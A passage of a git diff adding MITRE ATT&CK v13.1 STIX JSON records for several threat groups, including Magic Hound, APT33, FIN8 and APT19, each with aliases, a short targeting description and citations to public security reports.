"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694", + "type": "intrusion-set", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0068", + "external_id": "G0068" + }, + { + "source_name": "PLATINUM", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "source_name": "Microsoft PLATINUM April 2016", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + } + ], + "modified": "2021-04-22T00:39:49.529Z", + "name": "PLATINUM", + "description": "[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13.json new file mode 100644 index 0000000000000000000000000000000000000000..934fddd59b196b5fe008db74d19f41e6bf89b284 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13.json @@ -0,0 +1,156 @@ +{ + "type": "bundle", + "id": "bundle--96cfb954-c6c1-48b7-9cc8-c2d7d39344d2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-13T21:18:18.077Z", + "name": "Magic Hound", + "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)", + "aliases": [ + "Magic Hound", + "TA453", + "COBALT ILLUSION", + "Charming Kitten", + "ITG18", + "Phosphorus", + "Newscaster", + "APT35" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "5.1", + "x_mitre_contributors": [ + "Anastasios Pingios", + "Bryan Lee", + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0059", + "external_id": "G0059" + }, + { + "source_name": "Charming Kitten", + "description": "(Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "APT35", + "description": "(Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "ITG18", + "description": "(Citation: IBM ITG18 2020)" + }, + { + "source_name": "Phosphorus", + "description": "(Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "TA453", + "description": "(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)" + }, + { + "source_name": "COBALT ILLUSION", + "description": "(Citation: Secureworks COBALT ILLUSION Threat Profile)" + }, + { + "source_name": "Magic Hound", + "description": "(Citation: Unit 42 Magic Hound Feb 2017)" + }, + { + "source_name": "Microsoft Phosphorus Mar 2019", + "description": "Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.", + "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/" + }, + { + "source_name": "Microsoft Phosphorus Oct 2020", + "description": "Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.", + "url": "https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/" + }, + { + "source_name": "Certfa Charming Kitten January 2021", + "description": "Certfa Labs. (2021, January 8). Charming Kitten\u2019s Christmas Gift. Retrieved May 3, 2021.", + "url": "https://blog.certfa.com/posts/charming-kitten-christmas-gift/" + }, + { + "source_name": "Check Point APT35 CharmPower January 2022", + "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.", + "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" + }, + { + "source_name": "ClearSky Charming Kitten Dec 2017", + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + }, + { + "source_name": "ClearSky Kittens Back 2 Oct 2019", + "description": "ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf" + }, + { + "source_name": "ClearSky Kittens Back 3 August 2020", + "description": "ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf" + }, + { + "source_name": "Eweek Newscaster and Charming Kitten May 2014", + "description": "Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.", + "url": "https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering" + }, + { + "source_name": "Unit 42 Magic Hound Feb 2017", + "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + }, + { + "source_name": "Newscaster", + "description": "Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)" + }, + { + "source_name": "FireEye APT35 2018", + "description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.", + "url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" + }, + { + "source_name": "Proofpoint TA453 July2021", + "description": "Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453" + }, + { + "source_name": "Proofpoint TA453 March 2021", + "description": "Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential" + }, + { + "source_name": "Secureworks COBALT ILLUSION Threat Profile", + "description": "Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-illusion" + }, + { + "source_name": "US District Court of DC Phosphorus Complaint 2019", + "description": "US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.", + "url": "https://noticeofpleadings.com/phosphorus/files/Complaint.pdf" + }, + { + "source_name": "IBM ITG18 2020", + "description": "Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.", + "url": "https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7.json new file mode 100644 index 0000000000000000000000000000000000000000..85b21e532c5dac0d7c508d939b72cd748d3fb754 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--880c0636-578f-4ea5-9daf-b9862ae9e1f6", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Ajax Security Team", + "Operation Woolen-Goldfish", + "AjaxTM", + "Rocket Kitten", + "Flying Kitten", + "Operation Saffron Rose" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7", + "type": "intrusion-set", + "created": "2021-04-14T13:17:43.941Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0130", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0130" + }, + { + "source_name": "Operation Woolen-Goldfish", + "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015)" + }, + { + "source_name": "AjaxTM", + "description": "(Citation: FireEye Operation Saffron Rose 2013)" + }, + { + "source_name": "Rocket Kitten", + "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017)" + }, + { + "source_name": "Flying Kitten", + "description": "(Citation: CrowdStrike Flying Kitten )" + }, + { + "source_name": "Operation Saffron Rose", + "description": "(Citation: FireEye Operation Saffron Rose 2013)" + }, + { + "source_name": "FireEye Operation Saffron Rose 2013", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf", + "description": "Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020." + }, + { + "source_name": "Check Point Rocket Kitten", + "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018." + }, + { + "source_name": "TrendMicro Operation Woolen Goldfish March 2015", + "url": "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf", + "description": "Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go phishing. Retrieved April 21, 2021." + }, + { + "source_name": "IranThreats Kittens Dec 2017", + "url": "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/", + "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020." + }, + { + "source_name": "CrowdStrike Flying Kitten ", + "url": "https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/", + "description": "Dahl, M.. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020." + } + ], + "modified": "2021-12-17T19:27:27.246Z", + "name": "Ajax Security Team", + "description": "[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c.json new file mode 100644 index 0000000000000000000000000000000000000000..57967fc984b0454708392f0a73eaebcb57fa8cd1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c.json @@ -0,0 +1,125 @@ +{ + "type": "bundle", + "id": "bundle--5122e52c-9c96-456b-a4c1-3cb282190a18", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-29T16:53:17.235Z", + "name": "Threat Group-3390", + "description": "[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)", + "aliases": [ + "Threat Group-3390", + "Earth Smilodon", + "TG-3390", + "Emissary Panda", + "BRONZE UNION", + "APT27", + "Iron Tiger", + "LuckyMouse" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "intrusion-set", + "id": "intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c", + "created": "2017-05-31T21:31:58.518Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0027", + "external_id": "G0027" + }, + { + "source_name": "Threat Group-3390", + "description": "(Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018)" + }, + { + "source_name": "TG-3390", + "description": "(Citation: Dell TG-3390)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018)" + }, + { + "source_name": "Emissary Panda", + "description": "(Citation: Gallagher 2015)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "Iron Tiger", + "description": "(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "APT27", + "description": "(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "LuckyMouse", + "description": "(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "BRONZE UNION", + "description": "(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)" + }, + { + "source_name": "Earth Smilodon", + "description": "(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "SecureWorks BRONZE UNION June 2017", + "description": "Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.", + "url": "https://www.secureworks.com/research/bronze-union" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "Unit42 Emissary Panda May 2019", + "description": "Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + }, + { + "source_name": "Gallagher 2015", + "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as \u201cwatering holes\u201d. Retrieved January 25, 2016.", + "url": "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" + }, + { + "source_name": "Hacker News LuckyMouse June 2018", + "description": "Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.", + "url": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html" + }, + { + "source_name": "Securelist LuckyMouse June 2018", + "description": "Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.", + "url": "https://securelist.com/luckymouse-hits-national-data-center/86083/" + }, + { + "source_name": "Trend Micro Iron Tiger April 2021", + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html" + }, + { + "source_name": "Trend Micro DRBControl February 2020", + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + }, + { + "source_name": "Nccgroup Emissary Panda May 2018", + "description": "Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda \u2013 A potential new malicious tool. Retrieved June 25, 2018.", + "url": "https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json new file mode 100644 index 0000000000000000000000000000000000000000..2f9b331155aac85f2480b3951060ac119330847d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--8f69ccbb-0350-4ae0-9c41-a5e8574e90dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:07:25.123Z", + "name": "APT33", + "description": "[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "aliases": [ + "APT33", + "HOLMIUM", + "Elfin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0064", + "external_id": "G0064" + }, + { + "source_name": "APT33", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "HOLMIUM", + "description": "(Citation: Microsoft Holmium June 2020)" + }, + { + "source_name": "Elfin", + "description": "(Citation: Symantec Elfin Mar 2019)" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + }, + { + "source_name": "Microsoft Holmium June 2020", + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b.json new file mode 100644 index 0000000000000000000000000000000000000000..0b86e87c3303ff926c3159c8b8a5f469e1afe8de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1801bdbb-b230-4ec4-a33e-ee1be81f2bfe", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "FIN10" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b", + "type": "intrusion-set", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0051", + "external_id": "G0051" + }, + { + "source_name": "FIN10", + "description": "(Citation: FireEye FIN10 June 2017)" + }, + { + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "description": "FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.", + "source_name": "FireEye FIN10 June 2017" + } + ], + "modified": "2021-05-26T12:35:39.400Z", + "name": "FIN10", + "description": "[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826.json new file mode 100644 index 0000000000000000000000000000000000000000..aadbb48aadb2211eecb656b867f39bf6456ae41d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c020d200-967d-4c12-9042-e4005d151559", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:52:13.089Z", + "name": "FIN8", + "description": "[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail, restaurant, and hospitality industries. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Fin8 May 2016)", + "aliases": [ + "FIN8" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0061", + "external_id": "G0061" + }, + { + "source_name": "FIN8", + "description": "(Citation: FireEye Obfuscation June 2017)" + }, + { + "source_name": "FireEye Obfuscation June 2017", + "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", + "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" + }, + { + "source_name": "FireEye Fin8 May 2016", + "description": "Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6.json new file mode 100644 index 0000000000000000000000000000000000000000..f5136e8ef2a30cd47107225f0c5972214771222f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6.json @@ -0,0 +1,90 @@ +{ + "type": "bundle", + "id": "bundle--58cfe573-3b88-46a0-94b9-cd3850d52dba", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T20:44:02.443Z", + "name": "APT19", + "description": "[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)", + "aliases": [ + "APT19", + "Codoso", + "C0d0so0", + "Codoso Team", + "Sunshop Group" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.5", + "x_mitre_contributors": [ + "FS-ISAC", + "Darren Spruell" + ], + "type": "intrusion-set", + "id": "intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0073", + "external_id": "G0073" + }, + { + "source_name": "Sunshop Group", + "description": "(Citation: Dark Reading Codoso Feb 2015)" + }, + { + "source_name": "Codoso 